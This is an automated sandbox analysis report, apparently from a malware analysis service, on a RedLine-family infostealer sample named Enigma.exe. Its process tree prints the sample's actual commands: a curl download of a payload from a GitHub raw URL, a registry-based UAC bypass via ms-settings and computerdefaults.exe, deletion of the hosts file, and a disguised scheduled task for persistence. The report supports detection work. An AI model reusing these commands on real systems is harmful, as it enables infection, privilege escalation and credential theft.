Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
15/04/2024, 22:03
Static task
static1
Behavioral task
behavioral1
Sample
Enigma.exe
Resource
win7-20240221-en
General
-
Target
Enigma.exe
-
Size
1.2MB
-
MD5
d0f80a39b6f0a3beac677c6846c3b41a
-
SHA1
d7b1f3b1b53fa474247f9d4e63b959aa902866a4
-
SHA256
3ef10a8b44eb13fc45d40ced592fe9f1a83e6b021b3681da61f7cce688304047
-
SHA512
38cf9347f60cfa8a700f040e647deaac3309db71919b508ef7bf82f39b3497a5124413cdaae2ddc522200b23ab4c832f7c6ba72e673c8496ee8a36326c889270
-
SSDEEP
24576:3stMPfK4jgsfALDEx/AoO0RwqvpVQqblqJRYu/UZfh+n6A6qtFa:3stb+Jlp3gJerIn6ApF
Malware Config
Extracted
gozi
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/2608-171-0x0000000000690000-0x000000000075C000-memory.dmp family_zgrat_v1 behavioral2/memory/1368-170-0x0000000000400000-0x000000000044A000-memory.dmp family_zgrat_v1 behavioral2/memory/2608-172-0x0000000000690000-0x000000000075C000-memory.dmp family_zgrat_v1 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral2/memory/2608-171-0x0000000000690000-0x000000000075C000-memory.dmp family_redline behavioral2/memory/1368-170-0x0000000000400000-0x000000000044A000-memory.dmp family_redline behavioral2/memory/2608-172-0x0000000000690000-0x000000000075C000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Enigma.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions Enigma.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Enigma.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Enigma.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation Enigma.exe Key value queried \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation kdmapper.exe Key value queried \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 1436 kdmapper.exe 2608 physmeme.exe 2068 gyiczj2g.exe -
Loads dropped DLL 1 IoCs
pid Process 1436 kdmapper.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 3 raw.githubusercontent.com 4 raw.githubusercontent.com 15 discord.com 17 discord.com 21 raw.githubusercontent.com 39 discord.com 40 discord.com 53 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 checkip.amazonaws.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\kdmapper.exe Enigma.exe File created C:\Windows\SysWOW64\physmeme.exe curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4348 Enigma.exe 4348 Enigma.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2608 set thread context of 1368 2608 physmeme.exe 103 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN Enigma.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2868 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\appledamage91697.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings\shell\open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000_Classes\ms-settings\shell reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe 4348 Enigma.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 1436 kdmapper.exe Token: SeDebugPrivilege 1368 RegAsm.exe Token: SeDebugPrivilege 2068 gyiczj2g.exe Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe 4556 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1436 kdmapper.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3440 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4348 wrote to memory of 4596 4348 Enigma.exe 84 PID 4348 wrote to memory of 4596 4348 Enigma.exe 84 PID 4596 wrote to memory of 4556 4596 cmd.exe 85 PID 4596 wrote to memory of 4556 4596 cmd.exe 85 PID 4556 wrote to memory of 1360 4556 msedge.exe 87 PID 4556 wrote to memory of 1360 4556 msedge.exe 87 PID 4348 wrote to memory of 2960 4348 Enigma.exe 88 PID 4348 wrote to memory of 2960 4348 Enigma.exe 88 PID 4348 wrote to memory of 1436 4348 Enigma.exe 89 PID 4348 wrote to memory of 1436 4348 Enigma.exe 89 PID 4348 wrote to memory of 1436 4348 Enigma.exe 89 PID 4348 wrote to memory of 3416 4348 Enigma.exe 90 PID 4348 wrote to memory of 3416 4348 Enigma.exe 90 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 3648 4556 msedge.exe 91 PID 4556 wrote to memory of 4064 4556 msedge.exe 92 PID 4556 wrote to memory of 4064 4556 msedge.exe 92 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93 PID 4556 wrote to memory of 2120 4556 msedge.exe 93
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\Enigma.exe"C:\Users\Admin\AppData\Local\Temp\Enigma.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://discord.gg/P5448HTPrE3⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/P5448HTPrE4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff3dc646f8,0x7fff3dc64708,0x7fff3dc647185⤵PID:1360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:25⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:35⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:85⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:15⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:15⤵PID:1220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1464,8189374019848826141,1819703206631411821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:15⤵PID:468
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color D3⤵PID:2960
-
-
C:\Windows\SysWOW64\kdmapper.exe"C:\Windows\SysWOW64\kdmapper.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1436 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\appledamage91697.vbs" /f4⤵
- Modifies registry class
PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f4⤵
- Modifies registry class
PID:4132
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C computerdefaults.exe4⤵PID:3604
-
C:\Windows\SysWOW64\ComputerDefaults.execomputerdefaults.exe5⤵PID:1740
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\appledamage91697.vbs6⤵
- Checks computer location settings
PID:3564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:4960
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN VisualStudioUpdater_GyFeCElfnPIBLRXma050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\GyFeCElfnPIBLRXma050MX.exe" /RL HIGHEST /IT4⤵PID:3388
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /SC ONLOGON /TN VisualStudioUpdater_GyFeCElfnPIBLRXma050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\GyFeCElfnPIBLRXma050MX.exe" /RL HIGHEST /IT5⤵
- Creates scheduled task(s)
PID:2868
-
-
-
C:\Users\Admin\AppData\Local\Temp\gyiczj2g.exe"C:\Users\Admin\AppData\Local\Temp\gyiczj2g.exe" explorer.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://raw.githubusercontent.com/killebolaaaaaaaaaaaaaaaaa/pizdechui/main/mservice64.exe --output C:\Windows\SysWOW64\physmeme.exe3⤵PID:3416
-
C:\Windows\system32\curl.execurl --silent https://raw.githubusercontent.com/killebolaaaaaaaaaaaaaaaaa/pizdechui/main/mservice64.exe --output C:\Windows\SysWOW64\physmeme.exe4⤵
- Drops file in System32 directory
PID:4920
-
-
-
C:\Windows\SysWOW64\physmeme.exe"C:\Windows\SysWOW64\physmeme.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:448
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4336
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5104aab1e178489256a1425b28119ec93
SHA10bcf8ad28df672c618cb832ba8de8f85bd858a6c
SHA256b92c19f079ef5948cb58654ce76f582a480a82cddc5083764ed7f1eac27b8d01
SHA512b4f930f87eb86497672f32eb7cc77548d8afb09ad9fdba0508f368d5710e3a75c44b1fd9f96c98c2f0bd08deb4afde28330b11cf23e456c92cc509d28677d2cf
-
Filesize
152B
MD5846ce533b9e20979bf1857f1afb61925
SHA14c6726618d10805940dba5e6cf849448b552bf68
SHA256b81574d678f49d36d874dc062a1291092ab94164b92f7e30d42d9c61cc0e77c3
SHA5128fb228fae89f063159dabc93871db205d836bdb4ec8f54a2f642bd0b1ac531eea0c21234a8ca75a0ae9a008d2399a9bf20a481f5d6a6eab53a533cd03aeaaa2c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize312B
MD534924e3e6e46693dd37aafda6e5f4f30
SHA1f803ca700e07e7003e7ff82c356f86a907ee10f1
SHA2563400a3c5c79a598401970870cd8595f2b5e5b59253fa001d43a70b43609aba7b
SHA5128be0ed23eff4aab988db4fea0ad9c3c9a9c37f58e5c77a6ca7f7e2c4ff2623f4bf3015c7d20e46ba479dc4c303e8423bf5824b3550d6d62b091ecfa190011089
-
Filesize
20KB
MD5c36e2444ddef9c7c53ef59244a291631
SHA1ea8d42515ca7c61a16dbb1f76c1359fd4ac64898
SHA256d8a71d5bf7055f38b7e51f6876aef0fcb326adfe5dfb0d2df867ddbd43c0031e
SHA512cb37637ec58d27351b6367f6a910eff579e75ef3574b4472d4674467941849326ff7f0353b754e138a1a1b6744c2f4fd163c6850d629e25ccc38d4bb7a8ba5c3
-
Filesize
334B
MD5d96740baf1629d077b8620845c624392
SHA14d03b3f312750f4a12aed4d0f478951a92374fd2
SHA256bb0ccbd3c21fd13c481d4e34cc5e07da4c191252ccfc21661dc89f500ed5e323
SHA51286b20b1e0257c6b18a878174456c9d00f319a94cb2d9134e90ed79914ec57e18d5c5e376743262b9d224eae51c8a9706f1466d7da41edf1db8bdcd028a868cfd
-
Filesize
247B
MD594bd83393ee4e3c749f28c3414160cbc
SHA168effb04ecc392f2ae4ad7bdc1e99b9116da474c
SHA256e1dbf44fca250f32925910fcd7f59276e46d0d916eff30fdf9f85ef91bcd3d4b
SHA512203109a405cd685a195e6cdae5d0a624abcd6c6a9333b88f312e50f96bafa03057366bd78bf62df8784ec97f14677d56f8b78b472000044618a784bcf7af3e8a
-
Filesize
6KB
MD5f3b93a43119f6b014b3197cc908d5a68
SHA17fc4da5add1211ee50bd70f9eef037ec27f59931
SHA2560932d16c7250bb930711e21a3eae9cdf77fad5e3b1c264b944173452a8f4e4f1
SHA51225c3a5aff2cc126e04a6a427a6db29f57d2081c1251fa50b0b4c3fbf8f3959e0e215b7c03c11368e5bdc72a65110e463e109dbe60e7d12a4af116b552849bb91
-
Filesize
6KB
MD5adb34f00e40d7d737a0bf2d4a7b687e8
SHA1e4b28f54f3c81b1a101ab220207eeb600b812195
SHA256da14deb33a08558a31286fa1889a5a69dddf1a7add511945177f94405637d571
SHA512119fda9a360d09fada05beb58c7eb926dd9307240327d3e5da699a97bc36a3330ceed007bf238fac3228442da49d31dee1bd04e51eddd4319f8853381ba00fe6
-
Filesize
11KB
MD53ed4a31655aab30dcbc22df9a825cdfd
SHA10770e3d233ca92ee510e970c55bf574f4c2d7fc9
SHA256344ca1253e70261245db028615e7607eba653da7e8f725b3ab64bd975dc41cf1
SHA512336b2c602dbc2d021aa888d7a60138732d8e92083792a8f1eb3ae10e236c63b003bdfd8371deae8534830f2af8c68cdceaf896c38fcb08add629dea886b82b2a
-
Filesize
46KB
MD58f5942354d3809f865f9767eddf51314
SHA120be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218
-
Filesize
250KB
MD5cf377fa3e6e43a21d94b9ffdb49c60bd
SHA1e8347804317a5b68b6cdf773f61cc4f127ef7f5a
SHA25647176750489ae2286e8f11bc7a2f6bb6ca9891f5675d890a49c5b10a1fae5393
SHA5125b0d3644acd1cab540f7de0fbe23e0562cab2a05afeb9eb9aca680572c2a6f416011c4633917433e207eaf3f3e4db96c73a19148f21e3218c672e7d055914c19
-
Filesize
1.4MB
MD56f2fdecc48e7d72ca1eb7f17a97e59ad
SHA1fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056
SHA25670e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809
SHA512fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b
-
Filesize
171B
MD5a34267102c21aff46aecc85598924544
SHA177268af47c6a4b9c6be7f7487b2c9b233d49d435
SHA256eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44
SHA5125d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3
-
Filesize
124KB
MD5e898826598a138f86f2aa80c0830707a
SHA11e912a5671f7786cc077f83146a0484e5a78729c
SHA256df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA5126827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb
-
Filesize
331B
MD507d3b35bdf89da3e4f04572feb997e01
SHA1e68cf9d53e2279e5ea3663c9d37f31b7375b1d92
SHA25653621042886a856c05ffc10d1c4fc28420878aa308bdb10d4a8d1252e1ea6083
SHA5120de0a577ef0a9a3f025cfcccaa330b4e47ac5b8466a54f1b3e9125ee161fc33bfc14330d1ce416e568ef20f45f3a817dc011c7e5fdffb0c4d083d0ac4a7d31b0
-
C:\Users\Admin\AppData\Roaming\Gongle\aJVXGQGHN7\lazanq5n.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Filesize48KB
MD5a623029e1a42dc3b694868e66e9f23d5
SHA15f32b70d9bf41daaccc740fb26d8ba301726216d
SHA2567a1c31674786429093826e74b89eaa36fc6f4fbe56bef20b05931b9342127d96
SHA512c28a384dddd3ad7c494d0d20b7c4d46601f372fa979c561990f408cf2051d3b442ecb5f734bebf992ba09433efb65d80ab531496ba7fcd890b3ab0b6ec031069
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
332B
MD5ffe737fbd591da104908a52f17c5968c
SHA1db9d328d2d9cac44324063ecc159c950e6abd607
SHA256520e6a16244f1cc7ac657a939404ab0c6c3c33ad50d2616c91c3b23f4bf354e6
SHA512b0905af2da5fe304d9782152ff2c30ed5fd3d1ac3fd18127011c604345229a182f4638952548fea7d67bd49b30b68de5f87d73132d2e1965667d4ec3c3970bde
-
Filesize
291B
MD523cce48b97ab1576b002665b9f28fa66
SHA1a4f88547962069b45da75600edd3249aecb09661
SHA256a4d2072c1b5a950fa079fed86d255958221fe918bc33a4ea295b1ab1030285c8
SHA51209dc32f51cc9f808dc49fbf9f92cdeb64bd0a9f3f42dcfa8b9b77832df5e572c624cd4f1357312255d7486c4c8204420f23193ce888c61ad5d1a2ab3f4061e20
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
12KB
